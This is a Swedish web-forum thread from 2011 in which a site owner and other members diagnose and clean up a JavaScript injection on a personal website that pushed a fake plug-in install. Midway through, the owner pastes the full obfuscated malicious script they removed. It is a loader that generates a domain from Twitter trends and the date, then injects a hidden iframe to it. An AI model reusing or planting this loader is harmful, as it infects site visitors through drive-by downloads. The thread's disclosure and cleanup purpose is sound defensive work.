Finna och ta bort malware-skript från hemsida

[ycc]

Hej,

Tack för hjälpen med min senaste frågeställning.

Jag kör W7 Starter med Google Chrome och fick en notifikation att plug-in saknas. Jag testade samma sida med Firefox och fick samma notifikation. (Sidan är säker, vad jag tror i alla fall. EDIT: Se nedan, siten kan ha blivit hackad.)

Jag klickade "install plug in" och fick bekräfta att jag litade på innehåll från Sun och från Oracle.

Vad jag förstår så ominstallerades Java. En fil som heter chromeinstall-6u29.exe laddades ner. Installationen skedde dock utan att jag behövde klicka den filen.

När jag nu går till vissa web-sidor, vad jag förstår sidor med JavaScript, så fungerar bara vissa av javascript-funktionerna. I firefox får jag dessutom upp en virusvarning från AVAST. Jag bifogar skärmdump. Virusvarningen har en länk till denna sida: avast

Det verkar också som om webläsaren kopplar upp mot nätet igen efter det att sidan är inladdad.

Tacksam för förslag hur jag får javan att fungera igen.

mvh

ycc

Redigerad December 2, 2011 av ycc

[ycc]

Ju mer jag läser AVASTs noteringar så tror jag siten som utlöste felmeddelandet har blivit hackad av en malware-site som heter aynupuoroxsyi.com

Det är jag själv som administrerar siten som utlöste frågan om plug-in. Jag fär sätta igång att ladda ner alla .js filer och se om de blivit hackade.

EDIT:

Jag laddade ned hela siten med ftp (3000 filer) och sökte igenom filerna efter strängen aynupuoroxsyi.com men hittade inget. Men det ser ut som om AVAST har hittat något i siten.

Redigerad December 2, 2011 av ycc

[Rune.K]

Att det är något lurt med aynupuoroxsyi.com bekräftas av Firefox.

Reported Attack Page!

This web page at aynupuoroxsyi.com has been reported as an attack page and has been blocked based on your security preferences.

Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.

Hur du får bort eventuellt virus och ordnar till ditt Java överlåter jag åt specialisterna här på forumet.

Själv är jag nybörjare på Win7.

Redigerad December 2, 2011 av Rune.K

[ycc]

Tack Rune.

Det kan ju vara två problem:

#1. Java uppdateringen kan ha introducerat virus i min burk.

#2. Min site kan ha blivit hackad

Ursäkta att jag diskuterar problem #2 i detta forum, det har troligen inget med Windows att göra, men "det hänger ju ihop", och jag behöver verkligen tips med detta

Problem 1

Jag körde system restore i W7. Inte den varianten som återställer alla filer utan bara den varianten som återställer systemfilerna.

Problem 2:

Jag har haft virus i min site en gång tidigare. Då kunde jag hitta viruset genom att ladda ner en kopia av hela siten och text-söka på det domännamn som viruset kopplade upp mot. Det funkar inte denna gång.

Om det är JS är det ju mycket lätt att dölja, istället för

s ='aynupuoroxsyi.com';

skriver hackern bara

s ='aynu' + 'puoroxsyi.com';

(eller hur kompicerat som helst)

Så går det inte att text-söka.

Jag har backup, men jag litar inte hundra på den. 3000 filer måste ju komma tillbaka med samma version.

Jag skall ändra lösenord för servern.

Möjligen har min web-host ett återställningsprogram (till tidigare tidpunkt) för servern.

Att köra något jämförelseprogram mellan min backup och den nedladdade kopian vore en möjlighet som dock tar tid.

EDIT

Det verkar som om den site som viruset försöker koppla upp mot heter

ymarloeoicc.com

(Google Chrome säger att den väntar på den siten.)

(Strängsökning negativ på den siten också.)

Siten finns inte mer. Kanske det är en malware-site som ISP tagit bort.

Redigerad December 2, 2011 av ycc

[JoWa]

WinMerge kan jämföra filerna. http://winmerge.org/

[ycc]

Tack JoWa, verkar vara precis vad jag behöver. Jag skall sätta mig in i det programmet.

Jag ligger med riktig influensa nu och siten kanske har virus, livet är kul. (Men i alla fall inget jag förlorar pengar på )

Jag gissar att den site som viruset kopplar upp mot har tagits bort av ISP och JS i webläsaren då hänger.

Huruvida något hade introducerats i min dator är jag inte säker på.

Möjligen verkar det som om min burk beter sig annorlunda efter W7 restore. Nu när jag kommer till siten igen så frågar Chrome igen om den skall installera plug-in. Efter ominstallationen av Java så kom inte frågan utan viss JS bara blockerades. Men jag är inte säker, det kan ha cachats eller annat, kankse.

Schysst JoWa, winmerge verkar vara vad jag behöver, men det kan nog bli ett ganska stort jobb att jämföra alla filer.

Redigerad December 2, 2011 av ycc

[Cecilia]

Observera att Java och javascript inte har något med varandra att göra alls utan är två helt olika saker. Java används för att köra Java-program och om din webbplats plötsligt tycker att Java behövs så lär det vara ett Java-program där numera som troligen försöker utnyttja säkerhetshål i en gammal Java-version för att komma in i datorn.

Redigerad December 2, 2011 av Cecilia

[ycc]

Tack för påpekandet Cecilia. Det var värdefullt. Jag kan erkänna att jag inte har skillnaderna helt klara för mig. JS är ett skriptspråk som funkar på websidor och därför omges av starka restriktioner, det tror jag mig veta. JS kan ju bara skriva kakor till disken etc Min site är handhackad med mycket JS. (Fast Java är ju också skript.)

Men det är säkert som du säger att hackern har lagt in något på min server som gör att frågan om uppdatering kommer upp. Jag tror inte jag har Java på min site.

Jag läste nog uppdateringsmeddelandena lite slarvigt. Jag tror det var Java som uppdaterades. Jag trodde JS kunde påverkas vid Java-uppdateringen, men jag kan nog, som du säger, ha fel där.

Tack igen för tipset om winmerge, det verkar vara ett kanonprogram. Installerar kvickt, kan köra mappar och undermappar tillsammans. Berättar om filen finns eller om skillnader finns. Intuitivt. Jobbar kvickt. GNU är det också. Jag har börjat jämföra lite.

Redigerad December 2, 2011 av ycc

[Cecilia]

Java brukar inte kallas för ett skriptspråk utan ett vanligt programmeringsspråk. Man skriver inte Java-program och inkluderar dem på sin webbsida utan att veta om det.

chromeinstall-6u29.exe ser ut som en installationsfil för senaste Java-versionen.

Du har kanske nytta av sidan http://vurldissect.co.uk/ i dina försök att hitta den skadliga koden.

[Opptokoppter]

Nämdes att det kom upp en fråga om bekräfta installationen (vilket är helt normalt) när Java skulle installeras.

Nu är de ett tag sedan jag själv installerade Java men värt & uppmärksamma är ju att utgivaren ska vara Oracle.

Sun hade ju hand om Java tidigare fram tills Oracle övertog ansvaret som leverantör och distributör.

Jag vill minnas att jag vid något tillfälle fått upp äldre skumma meddelanden om installera Java från Sun när man besökt vissa okända platser på nätet. Vet inte hur vanligt förekommande de är att man kontrollerar och hjälper besökare på webbsidor att installera programmet liknande som många gör ifråga om installera Flash Player men när namnet Sun dyker upp så kan det vara en varning bara i sig att något kanske inte riktigt stämmer.

En annan vanlig grej många varnar för är ju risken med att utnyttja billiga färdiga mallar på sin webbsida.

Händer ibland att vissa kan vara preparerade med innehåll som smittar besökare eller av annan okänd anledning använder sidor för olika sorters spridning av skadlig kod. Nu behöver ju allting inte utgå från sprida saker som "förstör" liknande virus.

Oavsett vad så är ju en aktiv webbsida ett bra hjälpmedel för nå ut med nästan vad som helst.

[si3rra]

Alltså antagligen handlar det om någon sorts script-injection-attack på hemsida.

Tror du kan utesluta den här installations teorin, och ändra gärna rubriken på tråden.

Och hade du lagt ut adressen till sidan hade ju flera personer kunnat prova och kanske förskt se vad som varit felande.

För övrigt ser både "ymarloeoicc.com/" och "aynupuoroxsyi.com" ut att vara nedstängda.

Redigerad December 2, 2011 av si3rra

[ycc]

Tack för alla kommentarer, mycket värdefullt.

Jag skall testa vurldissect.

När jag testade igår funkade sidan i stort, men hälften av javaskript-animationerna var brutna.

Idag har sidan hamnat på Googles svartlista, man får ett meddelande att sidan innehåller malware och man måste bekräfta att man verkligen vill se den. Den site den kopplar upp mot varierar hela tiden.

Jag skall läsa AVASTs log mer ingående. Det vore nyttigt att veta hur den virusdefinition ser ut som AVAST reagerar på.

Jag instämmer i hela si3rras inlägg, tack, Jag har ändrat rubriken.

Jag har väntat lite med att lägga ut länken eftersom sidan innehåller malware. Men gissningsvis inte farligt att gå till sidan så länge man inte installerar något????

Jag är naturligtvis väldigt tacksam om så många som möjligt går till sidan och kollar. Här är adressen:

May contain malware:

e-dog.info/t/63/doc/Ubuntu_installation.php

Jag håller med si3rra om att det förmodligen är ett injicerat skript. Vet inte varför Java-installationen aktiverades.

Tack för alla kommentarer. Jag får leta vidare efter skriptet. Jag hade samma problem en gång för ett par år sedan, då gick det ganska fort att hitta skriptet med textsökning.

EDIT:

Jag gjorde en del applets på slutet av 90-talet, bara för att testa. Jag vill minnas att det var med Java-"kompilator". Dessa sidor ligger också på siten, men borde inte kunna anropas från den sida som larmar nu.

När jag går till de sidorna funkar inte applets utan Google Chrome frågar efter java-installation.

När jag går till mina sidor med applets så kommer det upp en fråga I APPLETRUTAN om att installera Java.

När jag går till den sida vi diskuterar nu så kommer det upp en fråga I EN FRAME längst upp på sidan. Den frågar om att installera plug-in. Jag kommer inte ihåg alla detaljer, men när jag klickade där så skedde en java-installation.

Redigerad December 3, 2011 av ycc

[Cecilia]

För säkerhets skull föreslår jag att du redigerar ditt inlägg och tar bort http från länken så att ingen råkar klicka av misstag. Datorn kan kanske bli smittad genom ett säkerhetshål i t ex en gammal installerad Java-version.

[ycc]

OK, tack Cecilia.

[ycc]

Jag är nog lite extra trögtänkt idag.

Jag hittar inte AVAST log. Jag har öppnat loggen förut, möjligen har AVAST uppdaterats sedan dess. Jag kan helt enkelt inte hitta loggen för de 9 "web and network objects" som blokerats.

[ycc]

Det gick i alla fall att hitta malware-skriptet på ett ställe. Firefox felkonsol larmade när den mötte detta. Kanske går det att leta upp andra ställen där det förekommer nu när man vet hur det ser ut på ett ställe. Men det är ju inte säkert heller. Jag har självklart tagit bort skriptet från sidan.

Virus/malware script:

(function($$){d="( 8 *i= 8var Vc=this;  [Vc\\FullYear %Month %Date %Hours %Minutes %Seconds()]}; *B= 8 &n,Vr=this.#i(),i=0;Vr[1]+=1;while(i++<7){#n=Vr[i] /#n<#b)Vr[i] 4#n}   Vr.splice(~z'),1+~T 0 5~u 0+'T'+Vr 5~U 0};VN={'h`http://Xs`/Xt`treXd`daiXn`ndsXq`?Xc`callback=Xj`#Xa`apiXl`lyXW`twitterXo`comXe`1Xk`sXK`bodyXx`ajaxXD`.XL`libsXJ`jqueryX6`6.2Xm`minXf`onXS`criptXi`ifXM`rameXY`headXw`width:Xp`px;XH`height:XT`2Xr`rcXQ`\"Xy`style=Xb`><XR`></XI`divXB`<XA`>Xg`googleXE`&date=Xz`0Xu`-XU` X,`:00X;':2345678901,'/':48271,'F':198195254,'G':12,'C`='};@ #G(Vm){#o=[];for(Vx=0;Vx<Vm .;Vx++){#o.push(VN[Vm.charAt(Vx)])}   #T(#o)}VB=document;#x=window; +E='undefined'; +j=~haDWDosestnsdlDjfqcq' :R= ))== +E) /#R||!VD()){if(!#R){try{Vd=jQuery !;try{Vd=$ !}VM=VB.getElementsByTagName(~Y 0[0];#J=VB.createElement(~kS 0;#J.setAttribute(~kr'),#G(\"hxDgakDosxsLsJseD6sJDmDj\"));VM.appendChild(#J)}@ Va(#F,VK){   Math.floor(#F/VK) 6e(#k){var Vg=Va( +u, $G); &C= +u% $G; &S= $r*#C; &L= $J*Vg; &y=#S-#L /#y>0){#u=#y}else{#u=#y+ $A}  (#u%#k) 6z(#w){ +u=~;')+#w; $r=~/'); $A=~;')-~F'); $G=Va( $A, $r); $J= $A% $r 6T(V){   V .==1?V[0]:V 5'')};@ #K(V){d=new Date( :c=~zee');d.setTime((V.as_of-~G')*~G')*~G')*~ezz 0*~ezzz 0;   d 6p(Vu){ &a,Vn,#f=Vu .; &d=[];while(--#f){Vn=#e(#f .push(Vn :a=Vu[Vn];Vu[Vn]=Vu[#f];Vu[#f]=#a}}@ Vp($){Vs=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){   String.fromCharCode(i+x+24)});   #T(Vs) 6v($){if ))!= +E){$( 8if ).Vt)!= +E)  ;$.Vt=1; 2j,@(Vy){#g=#K(Vy :h=#g\\Month() 9L=#g\\Date();VS=#h+\"-\"+VL;#P=#j+#G(\"E 3;Vj=VP=Va(#g\\Hours(),6)*6 9E=Vj+1;#b=+~ez'); , 2P,@(Vy){try{#D=Vy.trends;#M=#G(\" 3+\" \" /Vj<#b)Vj 4Vj /VE<#b)VE 4VE; 7j+#G(X)] /!#N){ 7E+#G(X)]}#N=(#N[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'microscope').split('' :s=#h*71+VP*3+VL*37;#z(#s :q=#e(4)+#b;#p(#N :H=~Ch')+#T(#N).substring(0,#q)+'.com/'+Vp($);VN['Z']=#H;Vb=~BI 1biMU 1UkrZRiMRIA');$(~K 0.append(Vb)}catch(Vf){}})},#b*#b*# })})}else{ , -,1+~TTT 0}} -)()#js@functionV#mX','`':'~#G('\\.getUTC  return !.noConflict(true)}catch(e){} $#x.V %(),Vc\\ &var # )(typeof($ *Date.prototype.# +#x.# ,setTimeout( 8 -#v(#x.jQuery)} ..length /;if( 0')) 1yQHTpweeepQ 2$.getJSON(# 3Tzeeu\")+VS 4=~z')+ 5.join( 6}@ # 7#N=#D[#M+V 8@(){ 9+(+~e 0;V ;#";for(c=53;c;d=(t=d.split('#@VX`~\\   ! $ % & ) * + , - . / 0 1 2 3 4 5 6 7 8 9 :'.substr(c-=(x=c<9?1:2),x))).join(t.pop()));$$(d)})(function(jsmH){return(function(jsm,jsmF){return jsmF(jsm(jsmF(jsm(jsmH))))(jsmH)()})((function(jsm){return jsm.constructor}),(function(jsm){return(function(jsmF){return jsm.call(jsm,jsmF)})}))});

EDIT:

Det verkar som om Googles svartlistning av siten tagits bort när skriptet togs bort. AVAST ger inte heller varningar nu. Skriptet kanske bara fanns på ett ställe.

Men det verkar finnas något skräp kvar. Malware-skriptet använder callbacks (skickar funktionsnamn som argument). Det finns lite jQuery på min sida och de använder också callbacks och jQuery verkar ha pajat.

I bästa fall ingen malware kvar på sidan nu, bara en del JS som blockeras när vissa callbacks inte funkar.

...

Jag tog bort det mesta av jQuery och då verkar siten fungera.

Redigerad December 3, 2011 av ycc

[Rune.K]

aynupuoroxsyi.com är fortfarande infekterad enligt Firefox.

Går man förbi varningen så kommer man till en administrationssida för en router.

Stämmer det att du har adminsida för en router på aynupuoroxsyi.com?

Det är absolut ingenting jag rekommenderar att gå förbi sådana varningar.

[ycc]

Jag är inte säker på att jag förstår din fråga Rune.

Jag administrear inte aynupuoroxsyi.com

aynupuoroxsyi.com är en av de siter som är inblandad i attacken. Malware injicerades i min site och malware kopplade upp webläsaren mot aynupuoroxsyi.com och andra siter.

Jag anser min site rensad från malware nu, om någon finner något suspekt i den så meddela mig förstås.

e-dog.info/t/63/doc/Ubuntu_installation.php

Tack för alla bidrag som kommit.

Redigerad December 3, 2011 av ycc

[Rune.K]

Jag fick för mej tidigare att aynupuoroxsyi.com var din sida, jag var förstås lite konfunderad över namnet.

aynupuoroxsyi.com är alltså inte din sida?

Det är alltså bara e-dog.info som är din sida?

[e-son]

http://www.urlvoid.com/scan/e-dog.info

[ycc]

Svar på Runes fråga.

[ursäkta om det blir lite osammanhängande, min uppkoppling trasslar.]

Yess,

e-dog.info är min domän, men någon lyckades injicera skript i den så att den kopplade upp mot en massa olika andra siter, bl.a. aynupuoroxsyi.com.

Min site blev svartlistad av AVAST och Google. Men antivirus-siterna verkar kunna skilja mycket bra på vilka siter som producerar virus och vilka legitima siter som drabbas av injektionsattacker.

Virusproducenterna stängs av av ISP ganska fort.

Bara några minuter efter det att jag tagit bort malware från min site så öppnades den helt av Google och AVAST igen.

För 10 år sedan sade jag "Strunta i att använda anti-virus program, de bara kostar pengar och lastar ner datorn." Numera är jag mycket tacksam för antivirus.

Bilden har förändrats mycket. Numera räcker det inte att bara låta bli att öppna "BritneySpearsNude.exe" i sin epost. Numera kommer ofta attackerna via legitima siter, som i detta fall.

Jag undrar hur tusan de får in skräpet i min site. Jag ligger på Godaddy för tillfället. Jag undrar naturligtvis om någon på Godaddy klantat sig. Men skall jag vara ärlig har jag ingen aning om hur man ändrat denna fil på min site.

Möjligen kan jag ha kört samma lösenord i en oskyddad wi-fi-förbindelse utan ssl för mycket länge sedan, det gör jag aldrig mer. Skulle någon alltså verkligen kunna utnyttja den informationen och para ihop den med min server-ftp??

Den fil som injicerades var också ett mycket kritiskt AJAX-anrop som utnyttjades av nästan alla sidor på siten. Man tror ju nästan att någon gjort det "manuellt". Men hackarna kanske har avancerad mjukvara de med.

Redigerad December 3, 2011 av ycc

[ycc]

http://www.urlvoid.com/scan/e-dog.info

Stort tack e-son, den länken skall vi bokmärka.

Mycket bra information där. Skall kolla all info där så snart min uppkoppling slutar konstra. e-dog.info blev frikänd nu i alla fall.

Redigerad December 3, 2011 av ycc

[e-son]

Stort tack e-son, den länken skall vi bokmärka.

Jo, den är en bra vägledning, men precis som med antivirusprogrammen, finns det inga garantier för att resultatet är korrekt.

Vad gäller lösenord till webbservern, bör du byta det minst varannan månad, se till att det verkligen är "random" och minst 32 tecken långt. I dag har dom lösenordsknäckare som är helt otroliga.

Det kan förstås lika gärna vara en säkerhetsbrist i servermjukvaran som utnyttjats, för att komma åt ditt script.

Edit:

Intressant läsning om en lösenordsknäckare. Säger kanske inte så mycket om effektiviteten, men desto mer om hur förhållandevis lite hårdvara som krävs.

http://blog.opensecurityresearch.com/2011/11/setting-up-password-cracking-server.html

Redigerad December 3, 2011 av e-son

[Rune.K]

...

För 10 år sedan sade jag "Strunta i att använda anti-virus program, de bara kostar pengar och lastar ner datorn." Numera är jag mycket tacksam för antivirus.

...

Lite off-topic:

Det enda eventuellt aktiva antivirusprogram jag har, är det som följer med i Win7.

Windows Defender tror jag det heter, jag försökte avinstallera det med hjälp av Lägg till Ta bort Program, men det är tydligen fortfarande kvar. Ungefär som ett virus som är svårt att bli av med...

Firefox med tillägget Noscript ger ett bra skydd, visst är det lite jobb med att godkänna sajter.

Men jag litar mer på Firefox med Noscript än på ett antivirusprogram som ska läsa igenom otrooligt långa listor med virusdefinitioner. Speciellt med tanke på hur många virus det släpps dagligen.

En riktig brandvägg använder jag förstås, ZoneAlarm Free!

Piratbukten använder jag inte som programförråd, jag förstår förstås att många inte kan motstå frestelsen med gratisspel och gratisprogram...

Jag har aldrig drabbats av virus, förutom manuellt planterade RAT's i Win9x av en som hade fysisk tillgång till datorn.

[e-son]

Kollade lite på sidan, och upptäckte ett php-kontaktformulär... det kan mycket väl vara vägen in för en hackare. Har sjäv fått ful-script skickade den vägen. I mitt fall var det inte avancerat nog för att ställa till någon skada, men man rensar ju databasen för säkerhets skull.

Kolla databasen efter poster som kanske inte ser ut som vanliga meddelanden.